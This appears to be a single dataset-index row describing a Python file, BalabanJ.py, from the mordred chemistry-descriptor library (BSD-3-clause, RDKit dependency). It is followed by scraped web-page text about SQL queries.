| mordred-descriptor/mordred | mordred/BalabanJ.py | Python | bsd-3-clause | 733 | [
"RDKit"
] | ab2f287bbdb154553547cbf770b682b1367078e250b22e082ada5d7577ba906d |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.